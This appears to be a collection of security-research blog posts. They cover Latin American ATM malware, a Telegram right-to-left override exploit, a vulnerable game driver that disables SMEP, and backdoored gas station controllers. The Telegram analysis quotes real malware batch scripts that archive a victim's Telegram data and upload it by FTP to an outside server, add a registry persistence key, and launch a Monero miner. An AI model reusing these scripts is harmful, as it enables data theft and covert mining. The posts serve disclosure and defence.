A report from the European ATM Security Team (EAST), shows that global ATM fraud losses increased 18 percent to €156 million (US $177.5 million) in the first half of 2015, compared to the same period in 2014. EAST attributes much of that increase to an 18 percent rise in global card-skimming losses, which includes €131 million (U.S. $149 million) of that total. Unfortunately, it seems there are no official statistics of such attacks and loses in Latin America. ATEFI (the Latin American Association of Service, Operators and Electronic Funds Transfer) does not publish public reports on such attacks.

There is a strong “B2B” cooperation between Eastern European and Latin American cybercriminals. On December 7, 2015, a 26 years old Romanian citizen was arrested in Morelia, Mexico, as he was suspected to be involved in the credit card cloning business. He was caught with $180,000.00 mxn in cash (around $ 9,700.00 USD) after someone from the community reported his suspicious behavior. He had a criminal record in Romania for being a part of an illegal organization connected to counterfeiting and using stolen credit cards. At the beginning of 2017, 31 people were arrested in a coordinated police operation and were charged with belonging to a gang dedicated to the credit card cloning business, among them a Cuban citizen, an Ecuadorian citizen, nine Venezuelans, three Romanians, two Bulgarians and 15 Mexicans. This served as further evidence that carders from Europe and Latin America are connected and occasionally work together.

Backdoor.Win32.Skimer was the first malicious program infecting ATM machines that came up back in 2008. Once the ATM was infected using a special access card, criminals were able to perform a number of illegal operations: withdrawing cash from the ATM, or obtaining data from cards used in the ATM. The coder behind it clearly new how ATM hardware and software work. Our analysis of this Trojan concluded that it was designed to target ATM machines in Russia and Ukraine. It works with US dollar, Russian ruble, and Ukrainian hryvnia transactions. More recently, in 2014, we published a detailed post about Tyupkin, an ATM malware found active on more than 50 ATMs in financial institutions in Eastern Europe. We have enough evidence that Latin American cybercriminals are cooperating with the Eastern European gangs involved with ZeuS, SpyEye and other banking Trojans created in that part of the world. This collaboration directly results in the code quality and sophistication of local Latin American malware. Regional cyber criminals also lease the infrastructure of their Eastern European counterparts. The same applies for ATM malware, which is evolving together with other Latin American malware families.

It’s also common to find Latin American criminals on Russian underground forums looking for samples, buying new crimeware packages and exchanging data about ATM/PoS malware, or negotiating and offering their “professional” services. Since most of them are not proficient in Russian, their writing often includes misspelled Russian words as they rely on automated translation services. Sometimes, they just write in Spanish, so Eastern European cybercriminals have to use automated translation. In any case, despite the language barrier, they negotiate use the acquired knowledge to boost the spread of their malware operations in Latin America.

Latin American criminals in the Russian underground: looking for ATM software

We believe that the first contacts between both cybercriminal worlds happened back in 2008 or even a little earlier. This is only the tip of the iceberg, as this kind of exchange tends to increase over the years as crime develops and looks for new techniques to attack businesses and end users in general.

Mexico: Ploutus – “god of wealth”

According to Greek mythology, Ploutus represented abundance and wealth; a divine child capable of dispensing his gifts without prejudice. However, in the real world, the economic impact of this rampant malware has been estimated at $ 1,200.000.000 MXN ($ 64,864,864.00 USD), considering that only in Mexico, approximately 73,258 ATMs have been found to be compromised.

The first variant of Ploutus became public in October 24, 2013, uploaded to VirusTotal by someone in Mexico, with the filename ‘ploutus.exe’. At that time, the sample had a low detection rate and some AV companies detected it as a Backdoor.Ploutus – Symantec or Trojan-Banker.MSIL.Atmer – Kaspersky.

During 2014 and 2015, a nation state level investigation in relation to ATM robberies using malware resulted in an increased number of uncovered incidents all over Mexico. In August 2013, investigators finally busted a operation connected to about 450 ATMs from 4 major Mexican banks.

Compromised machines were mostly located in places lacking or with very limited physical surveillance. Malware was deployed either via the CD-ROM drive (in the first versions) or a USB port in latter versions. These attacks caught the attention of the banks’ security departments in an odd manner. The armored transportation company began to receive a rare number of phone calls and alerts in respect to unusually high amounts of money being withdrawn from ATMs. The machines were reporting low cash flow levels just hours after being filled by the company in charge of this service.

The second attack was perpetrated during the Mexican Black Friday, locally known as “El Buen Fin”. During these dates, ATMs are stocked with more money in order to fulfill customer demand (approximately 20% more funds than usual are added). Lastly, the third attack was carried out during Valentine’s Day, which is celebrated on February 14th in Mexico. Dates in which ATMs are heavily used and have more funds than usual certainly attracted the attention of this group, which seemed to plan its attacks in advance while hiding in plain sight.

Ploutus developers are not trying to hide the origins of their code.

To install this malware, physical access to the ATM is needed. Usually, this is achieved via USB or CD drive, facilitating directly from the infected ATM machine and not merely cloning credit or debit cards. So, the damage is for financial Institutions and not their customers, at least not directly.

Strings in Spanish language display the goal of Ploutus

In this case, the business model is to sell licenses which are valid only for a day, allowing the “customer” (cybercriminal) to withdraw money from any number of machines during that particular day. It may take between two and half to three hours to empty the cash dispensing cassettes of an ATM.

According to a private investigation, a default arrangement for cybercriminals gangs is an average of 3 individuals per cell, with up to 300 people involved in the campaigns. Each group is responsible for compromising a chosen ATM with malware, obtaining an ID that is used afterwards to request an activation code via SMS, allowing full access to all of the ATM’s services.

Graphical user interface of an early version of Ploutus; shown when the correct activation sequence matches.

So far, we have seen four different versions or generations of the Ploutus malware family, the last one, which pertains to 2017, includes bug fixes and code improvements. For the first versions found in-the-wild there was no way of “calling home” or reporting the activities done on the ATM back to a C2 server. However, there is a SMS module used to obtain a unique identifier for the machine that allows the activation of the malicious code remotely. Once activated, money mules (operators standing at the ATM) can start withdrawing money until the licensed time expires. The procedure is as follows:

  1. Compromise the ATM, via physical access through the CD-ROM drive or USB ports of the machine.
  2. The install malware will run in the system as a regular Microsoft Windows service.
  3. Acquire an ATM ID used for the identification and activation of the machine.
  4. Some versions send a SMS to activate the “customer” (infected ATM), while others require physical access and connecting a keyboard in order to interact with the malware.
  5. Cash out while the malware is active for 24 hours.

The newest version, found in-the-wild later in 2017, granted criminals full remote administration of infected ATMs and the capability to run diagnostic tools along with other crafted commands. In that latest version we found that cybercriminals switched from a physical keyboard to access ATMs to WiFi access with a special modified TeamViewer Remote management tool module. This made it possible to conduct malicious operations more scalable and less risky for the cybercriminals.

Kaspersky Lab detects the samples described above as Backdoor.MSIL.Ploutus, Trojan-Spy.Win32.Plotus and HEUR:Trojan.Win32.Generic

Colombia: corruption, insiders and legit software

In October 2014, 14 ATMs were compromised in different cities of Colombia. The economic impact was around $ 1,024.00 million (Colombian Pesos) without any trackable transaction. Later, an employee at one of the banks was arrested as he was suspected of installing the malware remotely in all of the ATMs using his personal security code and passwords, just one day before resigning his job.

The suspect had previously worked for the Colombian police for 8 years as an electronic engineer specializing in computer security and also as a police investigator. At the time, he was in charge of large-scale investigations, but over the years he ended up leading a judicial file that surprised the investigators. On October 25th, he was arrested and charged by the authorities as the author of a multi-million fraud scheme aimed at a Colombian bank. At the time of his arrest, the criminal had remote access to 1,159 ATMs throughout Colombia. In the development of the illegal operation, the criminal used a modified legitimate ATM software, which left everything set for other members of the illegal organization to commit fraud in less than 48 hours in six different cities. This was the way Colombian media talked about the multi-million fraud against a local bank.

Insider with admin and remote access: 14 ATMs controlled and jackpotted in Colombia

To perform this attack the corrupted ex-police officer used a modified version of the ATM management software distributed by the manufacturer and their technical support staff. As an officer, he had access to this kind of software, which after installation, would interact with the XFS standard, sending commands to the ATM:

Legitimate software, misused: privileged access to steal money.

The target in this attack was Diebold ATM machines:

Target: Diebold ATM

Once the cybercriminal infected the ATMs with the mentioned legitimate but modified management software, a special access was granted. From that moment on, any kind of ATM malware could be installed, including Ploutus, which we saw was aggressively used in Peru and other South American countries.

Kaspersky Lab detects samples of the attack as: Trojan.MSIL.Agent and Backdoor.MSIL.Ploutus

Brazil: Prilex on top of the hill

Brazil is also notorious for developing and spreading locally built malware. The same can be said for their ATM and PoS malware. In 2017, we found an interesting new ATM malware family spread in-the-wild in Brazil. It’s developed from scratch in the country so the code doesn’t have similarities with any other known ATM malware family.

Prilex is an interesting ATM malware fully developed by Brazilian cybercriminals is Prilex. The criminals behind Prilex are also responsible for the development of several PoS malware, allowing them to target both ATM and PoS markets. The key difference of this attack is that instead of using the common XFS library to interact with the ATM sockets, it used some specified vendor’s libraries. Someone generously shared that information with the criminals.

Prilex’s piece of code with a lot of strings in Portuguese.

According to the code we analyzed, the cybercriminals behind it knew all about victim’s network diagram as well as the internal structure of the ATMs used by the bank. In one of the samples, we found a specific user account of someone working in the Bank. That may mean two things: an insider in the bank was leaking information to cybercriminals or the bank had suffered a targeted attack, which allowed the criminals to exfiltrate key information.

Command used to execute the process under specific credential.

Once the malware is running it has the capability of dispensing money from the sockets by using a special window which is activated by using a specific key combination, provided to the money mules by the criminals. There is also a component which reads and collects data from the magnetic stripe of the cards used it ATMs infected with Prilex. All information is stored in a locally saved file.

We believe that the group behind this malware family is not new. We had seen them running another campaign since at least 2015, not only for ATM but also PoS attacks.

Kaspersky Lab detects this malware family as Trojan.Win32.Prilex.


ATMs have been under constant attack since at least 2008-2009, when the first malicious program targeting ATMs, known as Backdoor.Win32.Skimer, was discovered. This is probably the fastest way for cybercriminals to get money – just right from the ATM. When it happens, we see two losses categories for the banks:

  1. Direct bank losses, when an attacker obtains money from an ATM cash dispenser.
  2. Indirect banks losses but losses to its customers. In this second scenario, cybercriminals steal from the customers’ bank accounts cloning unique cardholder data from the users’ ATM (including Track2 – the magnetic stripe data, the PIN – personal identification number used as a password, or new authentication methods, such biometric data).

To achieve their goals, attackers must solve one of these key challenges – they must either bypass customer authentication mechanisms or bypass the ATM’s security mechanisms. Criminals already use various methods to profit from ATMs, such as ram-raiding and dynamite explosive attacks, or traditional skimmers and shimmers to obtain customers’ information. It’s obvious criminal methods are shifting from physical attacks to so-called logical attacks. These can be described as non-destructive attacks. This helps cybercriminals stay undetected for longer periods of time, stealing not just once but several times from the same infected ATM.

ATM security is a complex problem that should be addressed on different levels. Many problems can only be fixed by the ATM manufacturers or vendors, especially with direct cooperation of security vendors.

The vast majority of ATM malware attention is placed on Eastern Europe, as the most developed cybercrime scene is in that part of the world. However, Latin America is one of the most dynamic and challenging markets in the world due to its particular characteristics. Regional cybercriminals are constantly seeking help and trading knowledge with their “colleagues” from Eastern European countries.

The constant monitoring of malicious activities by Latin American cybercriminals provides IT security companies with an advantageous opportunity to discover new attacks related to the financial sector. To have a complete understanding of the Latin American cybercrime scene, antimalware companies need to pay close attention to the reality of the country, collect files locally, build local relationships, and keep local analysts to monitor these attacks, mostly because it’s common for criminals to be extremely vigilant about their creations and how far these propagate. As it happens in Russia and China, Latin American criminals have created their own unique reality that’s sometimes quite difficult to grasp from the outside.

It’s very important for Financial Institutions, being such big and important targets for cybercriminals all over the world, to work on Threat Intelligence, including, not just global feeds, but also IOCs and Yara rules from hard to spot local attacks from regional experts. Our complete IOCs list, as well as Yara rules and full reports are available for Financial Intelligence Reports service customers. Need more information about the service? financialintel@kaspersky.com

Reference hashes


Zero-day vulnerability in Telegram

13 Únor, 2018 - 10:00

In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… http://t.co/wGxuRK1ReG pic.twitter.com/DWfPOYkZgO

— Mikko Hypponen (@mikko) 15 июля 2013 г.

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

    • The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

evil.js -> photo_high_re*U+202E*gnp.js
Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

  • The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:



  • When the user clicks on this file, the standard Windows security notification is displayed:


Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild

After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

Attack flowchart

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

(English translation) Function “Онлайн
(Online) Send list of files in directory to control bot. “Запус
(Launch) Launch executable file using Process.Start(). “Логгер
(Logger) Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content. “Скачать
(Download) Download file into its own directory. “Удалить
(Delete) Delete file from its own directory. “Распаковать
(Unpack) Unpack archive in its own directory using specified password. Убить
(Kill) Terminate specified process using process.Kill() Скачат
(Download) Same as ‘Download’ (see above), with different command parsing. Запуск
(Launch) Same as ‘Launch’ (see above), with different command parsing. Удалить
(Delete) Same as ‘Delete’ (see above), with different command parsing. Распаковать
(Unpack) Same as ‘Unpack’ (see above), with different command parsing. Процессы
(Processes) Send a list of commands running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

Attack flowchart

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:


This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:
  • taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:


st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches when system is booted next time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
“%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive
ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.beget.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:

The miner itself is launched as follows:

WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:


It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.

IoC MD5 First stage




C2 servers




A vulnerable driver: lesson almost learned

8 Únor, 2018 - 11:00

Recently, we started receiving suspicious events from our internal sandbox Exploit Checker plugin. Our heuristics for supervisor mode code execution in the user address space were constantly being triggered, and an executable file was being flagged for further analysis. At first, it looked like we’d found a zero-day local privilege escalation vulnerability for Windows, but the sample that was triggering Exploit Checker events turned out to be the clean signed executable GundamOnline.exe, part of the multiplayer online game Mobile Suit Gundam Online from BANDAI NAMCO Online Inc.

The initial sample is packed using a custom packer and contains anti-analysis techniques that complicate static analysis. For example, it tries to detect if it’s being launched inside a virtual machine by performing a well-known VMware hypervisor detection routine. It first loads the EAX register with the hypervisor magic value VMXh, and the ECX register with the value 0x0A, which is a special command to receive the hypervisor version. Then it performs an ‘in’ command to the VMware hypervisor I\O port 0x5658. If the EBX register is overwritten with VMXh as a result of that operation, it means the executable file is running on the VMware machine.

Our sandbox execution logs showed that the user space memory page is called from the driver bandainamcoonline.sys immediately after IOCTL request 0xAA012044 to device object \\.\Htsysm7838 that is created by the driver. The driver itself is installed just before that. It is first dropped to the directory C:\Windows\SysWOW64\ by a GundamOnline executable, loaded using NtLoadDriver() and deleted immediately afterwards.

Normally, this kind of behavior should not be allowed due to SMEP (Supervisor Mode Execution Prevention). This is a security feature present on the latest Intel processors that restricts supervisor mode execution on user memory pages. Page type is determined using the User/Supervisor flag in the page table entry. If a user memory page is called while in supervisor execution mode, SMEP generates an access violation exception and, as a result, the system will trigger a bug check and halt. This is commonly referred to as a BSOD.

The dropped driver itself is a legitimate driver, signed with a certificate issued to NAMCO BANDAI Online Inc.

The certificate validity period tells us two things. First, this certificate has been valid since 2012, which could mean that the first vulnerable version of the driver was released around the same time. However, we were unable to find one; the earliest sample of bandainamcoonline.sys that we found dates back to November 2015. Secondly, because it expired more than three years ago, you could be forgiven for thinking it’s impossible to install a driver signed with this certificate in a system. Actually, there’s nothing stopping you from installing and loading a driver with an expired certificate validity period.

In order to find the cause of the heuristics trigger, we need to do a static analysis of the driver itself. In the DriverEntry function it first decodes the device object name string in memory, and then creates the device \\.\Htsysm7838. The other two encoded strings – bandainamcoonline and bandainamcoonline.sys – are not used in the driver.

The driver itself is very small and contains only three registered major functions. Function IRP_MJ_DEVICE_CONTROL, which handles requests, accepts only two IOCTLs: 0xAA012044 and 0xAA013044. When called, it checks the size of the input and output buffers and eventually calls the ExecuteUserspaceCode function, passing on the contents of the input buffer to it.

The function ExecuteUserspaceCode performs a single check on the input buffer, which contains a pointer to a user space function or a shellcode, and disables SMEP while saving old CR4 register values. It then calls that function, passing it a pointer to the MmGetSystemRoutineAddress as an argument. After that it restores the original register state, re-enabling SMEP.

To be able to directly call the user function from the provided pointer driver it is necessary to remove a specific bit in the CR4 register first to temporarily stop SMEP, which is what the DisableSMEP function does. The original CR4 values are then restored by the EnableSMEP function.

The vulnerability in this case is that other than the basic checks on the format of the input buffer, no additional checks are done. Therefore, any user on the system can use this driver to elevate their privileges and execute arbitrary code in the Ring 0 of the OS. Even if the driver is not present in the system, an attacker can register it with Windows API functions and exploit the flaw.

We realized that this vulnerability looks exactly like the one found in Capcom’s driver last year.

Binary diffing bandainamcoonline.sys and capcom.sys proves exactly that, showing there are almost no differences between the two drivers. The only slight variations are the encoded strings and digital signatures. Because the earliest sample of the vulnerable driver that we’ve been able to find dates to November 2015, it can be assumed that this vulnerability first appeared in the bandainamcoonline.sys driver – almost a year before a similar driver was used by Capcom.

We believe both drivers were almost certainly compiled from the same source code, as a part of an anti-hacking solution to prevent users from cheating in the game. The presence of functions that implicitly disable and re-enable SMEP show that this design decision was intentional. But because the driver makes no additional security checks, any user can call and exploit the vulnerable IO control code by using Windows APIs such as DeviceIoControl(). This essentially makes the driver a rootkit, allowing anyone to interact with the operating system at the highest privilege level. In fact, we found multiple malware samples (already detected by our products) using a previously known vulnerability in capcom.sys to elevate their privileges to System level.

After finding the vulnerability we contacted BANDAI NAMCO Online Inc. The vendor responded promptly and released a patch three days later. They removed the driver altogether, and it is no longer loaded by the game executable. This is very similar to what Capcom did, and is perfectly acceptable in this case.

Finding this vulnerability wouldn’t have been possible without our Exploit Checker technology, which is a plugin for our sandbox, and can be also found in KATA (Kaspersky Anti Targeted Attack Platform). The technology was designed to monitor suspicious events that occur at the earliest post-exploitation phases and can detect common techniques used in exploits, such as ROP, Heap Spray, Stack Pivot, and so on. In this particular case, multiple heuristics for executing code in supervisor mode in the user address space were triggered, and the sample was flagged for further analysis. If a token-swapping attempt was performed to elevate process privileges, a technique that’s widely used in LPE exploits, it would have been automatically detected by Exploit Checker heuristics.

Kaspersky Lab solutions detect the vulnerable drivers mentioned in this article as HEUR:HackTool.Win32.Banco.a and HEUR:HackTool.Win32.Capco.a.

Gas is too expensive? Let’s make it cheap!

7 Únor, 2018 - 11:00

A few months ago, while undertaking unrelated research into online connected devices, we uncovered something surprising and realized almost immediately that we could be looking at a critical security threat. What we found was a simple purple web interface that was in fact a link to a real-life gas station, and we suspected this link made the station remotely hackable.

Amihai Neiderman, then working for Azimuth security, and I investigated the findings. When our suspicions turned out to be true, we reported them to the vendor.

The story was covered recently by Motherboard VICE, and here we will share some of the technical details behind it. Further details of this research will be shared in early March at the Security Analyst Summit 2018 in Cancun.

The device we investigated was not just a tiny web interface. It was an embedded box running a Linux-based controller unit that was installed with a tiny httpd server.

According to its manufacturer, the controller’s software is a site automation device that is responsible for managing every component of the station, including dispensers, payment terminals and more.

More specifically, the controller is at the heart of the station and if an intruder finds a way to take over the box, the results could be catastrophic. Another worrying detail, discovered later in the research, was when the solution was installed – many instances were embedded in fueling systems over a decade ago and have been connected to the internet ever since.

Before the research, we honestly believed that all fueling systems, without exception, would be isolated from the internet and properly monitored. But we were wrong. With our experienced eyes, we came to realize that even the least skilled attacker could use this product to take over a fueling system from anywhere in the world.

Hide & seek

The fuel stations we found using this product carried a watermark that can be found by running a search query with just one keyword. Within a few seconds, all those that are connected reveal their exact location and listening services.

The following chart uses data from an online search engine and other sources to show the geographical spread of the fuel stations. We found that more than 1,000 gas stations are accessible from any computer in the world. And when it comes to IoT hacking, gas stations are a far more dangerous target than webcams, for example.

Top countries with gas stations open to the internet (data from Shodan and telemetry sources)

Most of the research involved reviewing the information available online. It seems that the manufacturer posted much of the device’s technical information, allowing clients to go online and grab it. The user manuals were very detailed. They included screenshots, default credentials, different commands and a step-by-step guide on how to access and manage each of the interfaces. That alone assisted us in gaining all the information we needed, before we even wrote a single line of code.

We understood how obsolete the device was when we realized it was operative and accessible remotely using services you don’t expect to see in modern devices. The user manual carefully listed the services it was using and the network architecture. Understanding how the device operates in the network doesn’t require special hacking skills.

Network layout showing the main controller unit and its access privileges

Default credentials

We found many places where default credentials were mentioned. Using the online search engine, we even saw proof that the services listed in the manual were scraped by the engine at some point in time. Since the engine itself is fairly new, it is believed that the services are also accessible. Among the rest, SSH, HTTP and X11 were marked as potential access backdoors.

Shift management login page with security issues allowing complete bypass

During the research, we were able to log in to one shift management console. But that was just one instance – how could we be sure that all the other stations were accessible as well? We needed to ask permission from a gas station owner to let us access the station when it was offline.

We wanted to understand what exactly was behind that web interface. Did it have the same functionality as a web camera, or could we actually find a critical issue that could cause major damage?

The shift management console

The console appeared very robust. Considering the level of technical knowledge a shift manager is required to have, the functionality would allow them to pretty much change the dispenser settings, including gas station prices, printer settings, shift reports and more. The risk here stems from a malicious insider – a shift manager can modify shift reports, printed receipts and the actual gas price. We believe that such privileges should be reserved for the gas station owner only. In addition, we suspect that there are more interfaces in the network which allow a shift employee to track the convenience store and payment terminal using high privileges as well. In the sketch above, there was no mention of any protection software in place.

Functionality to change gas prices available to gas station shift manager

The next step in the research was to verify if we could access the station remotely without any credentials. We started looking for creative ways to bypass the authentication mechanism. Presuming it was obsolete and not properly tested before being deployed, we didn’t expect it to take more than a day or two.

A snake in the haystack

We were positive that a coding vulnerability would be the first thing to surface, but it was something we least expected to find that first caught our attention.

Once the initial firmware dump and main binary reversing step was completed, we searched for the login mechanism within the decompiled code. To our surprise, the following ‘if’ condition was a core part of that mechanism. It was a hardcoded username and password. In other words, a manufacturer backdoor for cases when the device requires remote or local access with the highest privileges.

Hardcoded credentials, a zero-day vulnerability reserved with CVE-2017-14728

Every similar device belonging to that vendor, up to the version we found, contained these hardcoded credentials. We reported our findings to MITRE to reserve the CVE, and contacted the vendor.

In addition to hardcoded passwords, we found many areas that we suspect contain insecure code and which might allow code to be executed remotely. One of these components – soWebServer::XMLGetMeansReportRowsNumber code review boiled down to a name parameter which is being controlled by the end user and is prone to a stack-based buffer overflow attack. Based on that finding, we compiled a fully working remote code execution. Part of that code is in the following screenshot.

Code for remote login and stack buffer overflow

Another code area which captured our attention was an authentication component which contained SQL injection. Throughout the entire analysis, we haven’t found SQL injection preventions to be sufficient. This is one example:

Code to extract gas station’s name and location

Geo exploitation

It is perfectly plausible that an IP address shows the actual location of a gas station, but we wanted to dig even further into the code and understand whether a gas station owner actually inputs the name of the gas station, or any location ID that can be traced, to find the actual location, gas vendor and other information related to that location.

We found an XML component which is responsible for generating reports on a daily basis. It was found to contain a parameter that holds the actual name and location of the station. We wrote a quick proof of concept to simply extract this parameter’s value.

Code to extract gas station’s name and location

As said, the code was not tested globally, but in the one case we had, it did extract the name, which after a few searches retrieved the exact location, vendor name and contact details.

Update price

Given the possibility of utilizing the hardcoded credentials to access the SiteOmat’s web interface and tamper with the update_price.cgi component’s input parameters, an intruder would be able to change the fuel price. To reproduce such attempt, first thing that needs to be done is to extract the victim dispenser’s information in a JSON format, to better understand which products are being sold and for what price. This can be achieved using one of the XML files responsible for storing the real-time prices in the local database.

Code snippet taken from the price modification proof of concept

Each product has an ID, a gas type, a name following the type and price. An intruder only needs to modify the gas type in order to update the price.

Once the intruder decides which of the prices to change, they will have to query for the relative CGI component that changes the price.

The payment terminal

An intruder that gains access to the gas station is able to connect directly to the payment terminal, and either extract payment information or directly exploit the payment bridge to steal transactions. We did not cover that area in our research since we lacked the access to the gas station network, though we strongly believe that it requires inspection and testing.

What an intruder can do

To give you some idea of the capabilities an intruder gains when taking over a gas station system through the vulnerable device we uncovered, here are a few scenarios:

  • Shut down all fueling systems
  • Cause fuel leakage and risk of casualties
  • Change fueling price
  • Circumvent payment terminal to steal money
  • Scrape vehicle license plates and driver identities
  • Halt the station’s operation, demanding a ransom in exchange
  • Execute code on the controller unit
  • Move freely within the gas station network

To the best of our knowledge, the vulnerable gas stations have not yet been asked to disable remote access through this controller. On September of 2017, we alerted the vendor to the issues and offered to send full technical details to help ensure the vulnerabilities could be fixed.

The Motherboard Vice article referenced a recent incident in Moscow where a hacker helped to fraudulently siphon gas from customers using malicious code – but we do not believe this incident is related to the area of our research. Our online search did not find any gas stations in Russia with this controller installed, and a recent presentation in Moscow of our ongoing research did not make public the name of the product, its manufacturer or technical details of the vulnerabilities.

MITRE received reports on the vulnerabilities found during the research, though triage is still in process. CERT IL & US were also updated with details about the vulnerabilities.

Reported vulnerabilities – MITRE Reserved CVEs Description CVE-2017-14728 Hardcoded Administrator Credentials CVE-2017-14850 Persistent XSS CVE-2017-14851 SQL Injection CVE-2017-14852 Insecure Communication CVE-2017-14853 Code injection CVE-2017-14854 Buffer Overflow allows RCE

BSides NYC, a volunteer organized event put on by and for the community

6 Únor, 2018 - 11:00

Another edition of BSides NYC has passed, and as first time attendee and presenter, I was genuinely impressed with the impeccable organization, the content shared, and the interesting conversations that took place among enthusiasts and professionals from all over the world. I’ve been a long time follower and supporter of BSides events in Latin America, mainly due to the fact that they offer a relaxed venue for sharing and learning about the newest topics in information security, all while bringing together people from different backgrounds in a community-driven event.

This year’s edition of BSides NYC took place at the John Jay College of Criminal Justice, with faculty member and the deputy CISO of the City of New York opening the event along some additional memorable keynotes given by Runa Sandvik from the New York Times, and Amber Baldet from JP Morgan. Once the initial kick-off was done, each attendee was able to choose from two technical tracks, an entrepreneur track, or any of the available villages and workshops. It was certainly tough for everyone how to decide where to spend their time, taking a coffee break here and there to meet and greet colleagues, friends, and keep enjoying all the activities happening around.

After lunch, I began my presentation on “Threat hunting .NET malware with YARA”, giving some examples of how to use YARA and the newly added .NET module, particularly useful for tracking the growing number of malware relying on Microsoft’s flagship framework. For learning purposes I chose a very popular malware targeting Latin American ATMs named Ploutus, which has landed in US territory just recently. It was quite an experience to fit an entire day of YARA content in less than an hour, but fortunately everyone at the presentation was extremely supportive, whether they have been using the tool since the beginning or never heard about it before.

From https://twitter.com/mathmare_/status/954786901621387264

